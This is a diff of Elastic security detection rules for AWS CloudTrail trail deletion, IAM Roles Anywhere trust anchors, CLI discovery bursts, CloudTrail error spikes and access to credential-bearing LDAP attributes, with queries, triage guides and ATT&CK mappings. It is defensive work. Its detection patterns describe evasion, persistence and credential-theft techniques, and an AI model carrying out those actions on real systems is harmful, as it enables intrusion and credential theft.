whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail\n and event.provider:cloudtrail.amazonaws.com\n and event.action:DeleteTrail\n and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_DeleteTrail.html", - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/delete-trail.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "7024e2a0-315d-4334-bb1a-441c593e16ab", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Use Case: Log Auditing", - "Resources: Investigation Guide", - "Tactic: Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 210 - }, - "id": "7024e2a0-315d-4334-bb1a-441c593e16ab_210", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71de53ea-ff3b-11ee-b572-f661ea17fbce_3.json b/packages/security_detection_engine/kibana/security_rule/71de53ea-ff3b-11ee-b572-f661ea17fbce_3.json deleted file mode 100644 index b38592a6d88..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/71de53ea-ff3b-11ee-b572-f661ea17fbce_3.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an AWS IAM Roles Anywhere Trust Anchor with an external certificate authority is created. AWS Roles Anywhere profiles are legitimate profiles that can be created by administrators to allow access from any location. This rule detects when a trust anchor is created with an external certificate authority that is not managed by AWS Certificate Manager Private Certificate Authority (ACM PCA). Adversaries may accomplish this to maintain persistence in the environment.", - "false_positives": [ - "AWS IAM Roles Anywhere Trust Anchors are legitimate profiles that can be created by administrators to allow access from any location. Ensure that the trust anchor is created by a legitimate administrator and that the external certificate authority is authorized." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM Roles Anywhere Trust Anchor Created with External CA", - "note": "## Triage and analysis\n\n### Investigating AWS IAM Roles Anywhere Trust Anchor Created with External CA\n\nThis rule detects when an AWS IAM Roles Anywhere Trust Anchor with an external certificate authority is created. AWS Roles Anywhere profiles are legitimate profiles that can be created by administrators to allow access from any location. This rule identifies when a trust anchor is created with an external certificate authority that is not managed by AWS Certificate Manager Private Certificate Authority (ACM PCA). Adversaries may accomplish this to maintain persistence in the environment.\n\n#### Possible Investigation Steps:\n\n- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` fields to identify who made the change. Verify if this actor typically performs such actions and if they have the necessary permissions.\n- **Review the Request Details**: Examine the `aws.cloudtrail.request_parameters` to understand the specific details of the trust anchor creation. Look for any unusual parameters that could suggest unauthorized or malicious modifications.\n- **Analyze the Source of the Request**: Investigate the `source.ip` and `source.geo` fields to determine the geographical origin of the request. An external or unexpected location might indicate compromised credentials or unauthorized access.\n- **Contextualize with Timestamp**: Use the `@timestamp` field to check when the trust anchor was created. Changes during non-business hours or outside regular maintenance windows might require further scrutiny.\n- **Correlate with Other Activities**: Search for related CloudTrail events before and after this change to see if the same actor or IP address engaged in other potentially suspicious activities.\n- **Verify the Certificate Authority**: Ensure that the external certificate authority used is authorized and recognized. Unauthorized external CAs can be a red flag for malicious activity.\n\n### False Positive Analysis:\n\n- **Legitimate Administrative Actions**: Confirm if the trust anchor creation aligns with scheduled updates, development activities, or legitimate administrative tasks documented in change management systems.\n- **Consistency Check**: Compare the action against historical data of similar actions performed by the user or within the organization. If the action is consistent with past legitimate activities, it might indicate a false alarm.\n- **Verify through Outcomes**: Check the `aws.cloudtrail.response_elements` and the `event.outcome` to confirm if the creation was successful and intended according to policy.\n\n### Response and Remediation:\n\n- **Immediate Review and Reversal if Necessary**: If the creation was unauthorized, remove the trust anchor and revoke any associated permissions.\n- **Enhance Monitoring and Alerts**: Adjust monitoring systems to alert on similar actions, especially those involving the creation of trust anchors with external certificate authorities.\n- **Educate and Train**: Provide additional training to users with administrative rights on the importance of security best practices concerning IAM Roles Anywhere and the use of certificate authorities.\n- **Audit IAM Roles and Policies**: Conduct a comprehensive audit of all IAM roles and associated policies to ensure they adhere to the principle of least privilege.\n- **Incident Response**: If there's an indication of malicious intent or a security breach, initiate the incident response protocol to mitigate any damage and prevent future occurrences.\n\n### Additional Information:\n\nFor further guidance on managing IAM Roles Anywhere and securing AWS environments, refer to the [AWS IAM Roles Anywhere documentation](https://docs.aws.amazon.com/rolesanywhere/latest/userguide/introduction.html) and AWS best practices for security. Additionally, consult the following resources for specific details on IAM roles and trust anchors:\n- [AWS IAM Roles Anywhere Introduction](https://docs.aws.amazon.com/rolesanywhere/latest/userguide/introduction.html)\n- [Ermetic Blog on IAM Users and Third Parties](https://ermetic.com/blog/aws/keep-your-iam-users-close-keep-your-third-parties-even-closer-part-1/)\n", - "query": "event.dataset: aws.cloudtrail\n and event.provider: rolesanywhere.amazonaws.com\n and event.action: CreateTrustAnchor\n and event.outcome: success\n and not aws.cloudtrail.request_parameters: *sourceType=AWS_ACM_PCA*\n", - "references": [ - "https://docs.aws.amazon.com/rolesanywhere/latest/userguide/introduction.html", - "https://ermetic.com/blog/aws/keep-your-iam-users-close-keep-your-third-parties-even-closer-part-1/", - "https://docs.aws.amazon.com/rolesanywhere/latest/APIReference/API_CreateTrustAnchor.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "aws.cloudtrail.request_parameters", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "71de53ea-ff3b-11ee-b572-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.003", - "name": "Additional Cloud Roles", - "reference": "https://attack.mitre.org/techniques/T1098/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 3 - }, - "id": "71de53ea-ff3b-11ee-b572-f661ea17fbce_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_210.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_210.json index fbf6aa122ef..2b7b8d0069e 100644 --- a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_210.json +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_5.json b/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_5.json new file mode 100644 index 00000000000..e40fa99101c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_5.json @@ -0,0 +1,163 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a single AWS resource is running multiple read-only, discovery API calls in a 10-second window. This behavior could indicate an actor attempting to discover the AWS infrastructure using compromised credentials or a compromised instance. Adversaries may use this information to identify potential targets for further exploitation or to gain a better understanding of the target's infrastructure.", + "false_positives": [ + "Administrators or automated systems may legitimately perform multiple `Describe`, `List`, `Get` and `Generate` API calls in a short time frame. Verify the user identity and the purpose of the API calls to determine if the behavior is expected." + ], + "from": "now-6m", + "investigation_fields": { + "field_names": [ + "Esql.event_action_count_distinct", + "Esql.time_window_date_trunc", + "aws.cloudtrail.user_identity.arn", + "Esql.aws_cloudtrail_user_identity_type_values", + "Esql.aws_cloudtrail_user_identity_access_key_id_values", + "Esql.source_ip_values", + "Esql.source_as_organization_name_values", + "Esql.event_provider_values", + "Esql.event_action_values", + "Esql.cloud_account_id_values", + "Esql.cloud_region_values", + "Esql.data_stream_namespace_values" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "AWS Discovery API Calls via CLI from a Single Resource", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Discovery API Calls via CLI from a Single Resource\n\nThis rule detects when a single AWS identity executes more than five unique discovery-related API calls (`Describe*`, `List*`, `Get*`, or `Generate*`) within a 10-second window using the AWS CLI. \nHigh volumes of diverse \u201cread-only\u201d API calls in such a short period can indicate scripted reconnaissance, often an early phase of compromise after credential exposure or access to a compromised EC2 instance. \n\n#### Possible Investigation Steps\n\n**Identify the actor and session context**\n- **Actor ARN (`aws.cloudtrail.user_identity.arn`)**: Determine which IAM user, role, or service principal performed the actions. \n - Check whether this identity normally performs enumeration activity or belongs to automation infrastructure. \n- **Identity type (`Esql.aws_cloudtrail_user_identity_arn_type`)**: Validate if the caller is a human IAM user, assumed role, or federated identity. Unusual types (e.g., temporary credentials from an unfamiliar role) may indicate lateral movement. \n- **Access key (`Esql.aws_cloudtrail_user_identity_access_key_id_values`)** \u2013 Identify which specific access key or temporary credential was used. \n - If multiple suspicious keys are found, use AWS IAM console or `aws iam list-access-keys` to determine when they were last used or rotated. \n- **Account (`Esql.cloud_account_id_values`)** \u2013 Confirm which AWS account was affected and whether it matches the intended operational context (e.g., production vs. sandbox).\n\n**Assess the API call pattern and intent**\n- **Distinct action count (`Esql.event_action_count_distinct`)**: Note how many unique API calls occurred within each 10-second window. Counts far above normal operational baselines may indicate scripted reconnaissance. \n- **API actions (`Esql.event_action_values`)**: Review which discovery APIs were invoked. \n - Focus on services such as EC2 (`DescribeInstances`), IAM (`ListRoles`, `ListAccessKeys`), S3 (`ListBuckets`), and KMS (`ListKeys`), which adversaries frequently query to map assets. \n- **Service providers (`Esql.event_provider_values`)**: Identify which AWS services were targeted. \n - Multi-service enumeration (IAM + EC2 + S3) suggests broad discovery rather than a specific diagnostic task. \n- **Time window (`Esql.time_window_date_trunc`)**: Verify whether activity occurred during normal maintenance windows or outside expected hours.\n\n**Analyze the source and origin**\n- **Source IP (`Esql.source_ip_values`)**: Check the originating IPs to determine whether the calls came from a known internal host, an EC2 instance, or an unfamiliar external network. \n - Compare with known corporate CIDR ranges, VPC flow logs, or guardrail baselines. \n- **Source organization (`Esql.source_as_organization_name_values`)**: Review the associated ASN or organization. \n - If the ASN belongs to a commercial ISP or VPN service, investigate possible credential compromise or remote attacker usage.\n\n**Correlate with additional events**\n- Search CloudTrail for the same `aws.cloudtrail.user_identity.arn` or `aws_cloudtrail_user_identity_access_key_id_values` within \u00b130 minutes. \n - Look for follow-on actions such as `GetCallerIdentity`, `AssumeRole`, `CreateAccessKey`, or data access (`GetObject`, `CopySnapshot`). \n - Correlate this enumeration with authentication anomalies or privilege-related findings. \n- Cross-reference `Esql.cloud_account_id_values` with other alerts for lateral or privilege escalation patterns.\n\n### False positive analysis\n\nLegitimate, high-frequency API activity may originate from:\n- **Inventory or compliance automation**: Scripts or tools such as AWS Config, Cloud Custodian, or custom CMDB collection performing periodic Describe/List calls. \n- **Operational monitoring systems**: DevOps pipelines, Terraform, or deployment verifiers enumerating resources. \n- **Security tooling**: Security scanners performing asset discovery across services.\n\nValidate by confirming:\n- Whether the `aws.cloudtrail.user_identity.arn` corresponds to a documented automation or monitoring identity. \n- That the observed `Esql.event_action_values` match known inventory or cost-reporting workflows. \n- Timing alignment with approved maintenance schedules.\n\n### Response and remediation\n\nIf the activity is unexpected or originates from unrecognized credentials, follow AWS\u2019s incident-handling guidance:\n\n**1. Contain**\n- Temporarily disable or rotate the access key (`Esql.aws_cloudtrail_user_identity_access_key_id_values`) using IAM. \n- Restrict outbound connectivity for the instance or resource from which the API calls originated.\n\n**2. Investigate**\n- Retrieve full CloudTrail logs for the actor and `Esql.time_window_date_trunc` interval. \n- Identify any subsequent write or privilege-modification actions. \n- Review associated IAM policies for excessive permissions.\n\n**3. Recover and Harden**\n- Rotate credentials, enforce MFA on human users, and tighten IAM role trust policies. \n- Implement AWS Config rules or SCPs to monitor and restrict large-scale enumeration.\n\n**4. Post-Incident Actions**\n- Document the finding and response in your organization\u2019s IR management system. \n- Update detection logic or allow-lists for known benign automation. \n- Validate recovery by confirming no new suspicious discovery bursts occur.\n\n### Additional information\n\n- **AWS Documentation**\n - [CloudTrail Event Reference](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference.html)\n - [AWS Security Incident Response Guide](https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/aws-security-incident-response-guide.pdf)\n- **AWS Playbook Resources**\n - [AWS Incident Response Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/tree/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks)\n - [AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework)\n\n", + "query": "from logs-aws.cloudtrail-* metadata _id, _version, _index\n// create time window buckets of 10 seconds\n| eval Esql.time_window_date_trunc = date_trunc(10 seconds, @timestamp)\n\n| where\n event.dataset == \"aws.cloudtrail\"\n // filter on CloudTrail audit logs for IAM, EC2, S3, etc.\n and event.provider in (\n \"iam.amazonaws.com\",\n \"ec2.amazonaws.com\",\n \"s3.amazonaws.com\",\n \"rds.amazonaws.com\",\n \"lambda.amazonaws.com\",\n \"dynamodb.amazonaws.com\",\n \"kms.amazonaws.com\",\n \"cloudfront.amazonaws.com\",\n \"elasticloadbalancing.amazonaws.com\", \n \"cloudtrail.amazonaws.com\",\n \"sts.amazonaws.com\",\n \"ses.amazonaws.com\"\n )\n // ignore AWS service actions\n and aws.cloudtrail.user_identity.type != \"AWSService\"\n // filter for aws-cli specifically\n and user_agent.name == \"aws-cli\"\n // exclude DescribeCapacityReservations events related to AWS Config\n and event.action != \"DescribeCapacityReservations\"\n\n// filter for Describe, Get, List, and Generate API calls\n| where true in (\n starts_with(event.action, \"Describe\"),\n starts_with(event.action, \"Get\"),\n starts_with(event.action, \"List\"),\n starts_with(event.action, \"Generate\")\n)\n\n// extract owner, identity type, and actor from the ARN\n| dissect aws.cloudtrail.user_identity.arn \"%{}::%{Esql_priv.aws_cloudtrail_user_identity_arn_owner}:%{Esql.aws_cloudtrail_user_identity_arn_type}/%{Esql.aws_cloudtrail_user_identity_arn_roles}\"\n\n| where starts_with(Esql.aws_cloudtrail_user_identity_arn_roles, \"AWSServiceRoleForConfig\") != true\n\n// keep relevant fields (preserving ECS fields and computed time window)\n| keep \n @timestamp, \n Esql.time_window_date_trunc, \n event.action, \n aws.cloudtrail.user_identity.arn, \n aws.cloudtrail.user_identity.type, \n aws.cloudtrail.user_identity.access_key_id, \n source.ip, \n cloud.account.id, \n event.provider, \n user_agent.name, \n source.as.organization.name, \n cloud.region,\n data_stream.namespace\n\n// count the number of unique API calls per time window and actor\n| stats\n Esql.event_action_count_distinct = count_distinct(event.action),\n Esql.event_action_values = VALUES(event.action),\n Esql.event_timestamp_values = VALUES(@timestamp),\n Esql.aws_cloudtrail_user_identity_type_values = VALUES(aws.cloudtrail.user_identity.type),\n Esql.aws_cloudtrail_user_identity_access_key_id_values = VALUES(aws.cloudtrail.user_identity.access_key_id),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.cloud_account_id_values = VALUES(cloud.account.id),\n Esql.event_provider_values = VALUES(event.provider),\n Esql.user_agent_name_values = VALUES(user_agent.name),\n Esql.source_as_organization_name_values = VALUES(source.as.organization.name),\n Esql.cloud_region_values = VALUES(cloud.region),\n Esql.data_stream_namespace_values = VALUES(data_stream.namespace)\n by Esql.time_window_date_trunc, aws.cloudtrail.user_identity.arn\n\n// filter for more than 5 unique API calls per 10s window\n| where Esql.event_action_count_distinct > 5\n", + "references": [ + "https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + }, + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.aws_cloudtrail_user_identity_access_key_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_user_identity_type_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_account_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_region_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_action_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_action_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_provider_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_timestamp_values", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.source_as_organization_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.time_window_date_trunc", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.arn", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "74f45152-9aee-11ef-b0a5-f661ea17fbcd", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: AWS EC2", + "Data Source: AWS IAM", + "Data Source: AWS S3", + "Data Source: AWS Cloudtrail", + "Data Source: AWS RDS", + "Data Source: AWS Lambda", + "Data Source: AWS STS", + "Data Source: AWS KMS", + "Data Source: AWS SES", + "Data Source: AWS Cloudfront", + "Data Source: AWS DynamoDB", + "Data Source: AWS Elastic Load Balancing", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1580", + "name": "Cloud Infrastructure Discovery", + "reference": "https://attack.mitre.org/techniques/T1580/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 5 + }, + "id": "74f45152-9aee-11ef-b0a5-f661ea17fbcd_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_114.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_114.json deleted file mode 100644 index c49c60dc228..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_114.json +++ /dev/null @@ -1,127 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Access to a Sensitive LDAP Attribute", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Access to a Sensitive LDAP Attribute\n\nLDAP (Lightweight Directory Access Protocol) is crucial for accessing and managing directory information in Active Directory environments. Adversaries may exploit LDAP to access sensitive attributes like passwords and decryption keys, facilitating credential theft or privilege escalation. The detection rule identifies unauthorized access attempts by monitoring specific event codes and attribute identifiers, excluding benign activities to reduce noise, thus highlighting potential security threats.\n\n### Possible investigation steps\n\n- Review the event logs for event code 4662 to identify the specific user or process attempting to access the sensitive LDAP attributes.\n- Check the winlog.event_data.SubjectUserSid to determine the identity of the user or service account involved in the access attempt, excluding the well-known SID S-1-5-18 (Local System).\n- Analyze the winlog.event_data.Properties field to confirm which sensitive attribute was accessed, such as unixUserPassword, ms-PKI-AccountCredentials, or msPKI-CredentialRoamingTokens.\n- Investigate the context of the access attempt by correlating the event with other logs or alerts around the same timestamp to identify any suspicious patterns or activities.\n- Verify the legitimacy of the access by checking if the user or process has a valid reason or permission to access the sensitive attributes, considering the organization's access control policies.\n- Assess the potential impact of the access attempt on the organization's security posture, focusing on credential theft or privilege escalation risks.\n- Document findings and, if necessary, escalate the incident to the appropriate security team for further action or remediation.\n\n### False positive analysis\n\n- Access by legitimate administrative accounts: Regular access by system administrators to sensitive LDAP attributes can trigger alerts. To manage this, create exceptions for known administrative accounts by excluding their SIDs from the detection rule.\n- Scheduled system processes: Automated tasks or system processes that require access to certain LDAP attributes may cause false positives. Identify these processes and exclude their specific event codes or AccessMasks if they are consistently benign.\n- Service accounts: Service accounts that perform routine directory operations might access sensitive attributes as part of their normal function. Exclude these accounts by adding their SIDs to the exception list to prevent unnecessary alerts.\n- Monitoring tools: Security or monitoring tools that scan directory attributes for compliance or auditing purposes can generate false positives. Whitelist these tools by excluding their event sources or specific actions from the detection criteria.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Conduct a thorough review of the access logs to identify any unauthorized users or systems that accessed the sensitive LDAP attributes.\n- Reset passwords and revoke any potentially compromised credentials associated with the affected accounts, focusing on those with access to sensitive attributes.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the scope of the breach.\n- Implement additional monitoring on the affected systems and accounts to detect any further suspicious activities or attempts to access sensitive LDAP attributes.\n- Review and update access controls and permissions for sensitive LDAP attributes to ensure they are restricted to only necessary personnel.\n- Conduct a post-incident analysis to identify any gaps in security controls and update policies or procedures to prevent similar incidents in the future.", - "query": "any where event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", - "references": [ - "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", - "https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AccessMask", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.Properties", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectUserSid", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66", - "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1003", - "name": "OS Credential Dumping", - "reference": "https://attack.mitre.org/techniques/T1003/" - }, - { - "id": "T1552", - "name": "Unsecured Credentials", - "reference": "https://attack.mitre.org/techniques/T1552/", - "subtechnique": [ - { - "id": "T1552.004", - "name": "Private Keys", - "reference": "https://attack.mitre.org/techniques/T1552/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.002", - "name": "Domain Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 114 - }, - "id": "764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_114", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_208.json b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_208.json index ed90e4975da..726b5936cb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_208.json +++ b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_208.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/78d3d8d9-b476-451d-a9e0-7a5addd70670_212.json b/packages/security_detection_engine/kibana/security_rule/78d3d8d9-b476-451d-a9e0-7a5addd70670_212.json new file mode 100644 index 00000000000..a6120fe4a2d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/78d3d8d9-b476-451d-a9e0-7a5addd70670_212.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected a significant spike in the rate of a particular error in the CloudTrail messages. Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery.", + "false_positives": [ + "Spikes in error message activity can also be due to bugs in cloud automation scripts or workflows; changes to cloud automation scripts or workflows; adoption of new services; changes in the way services are used; or changes to IAM privileges." + ], + "from": "now-60m", + "interval": "15m", + "license": "Elastic License v2", + 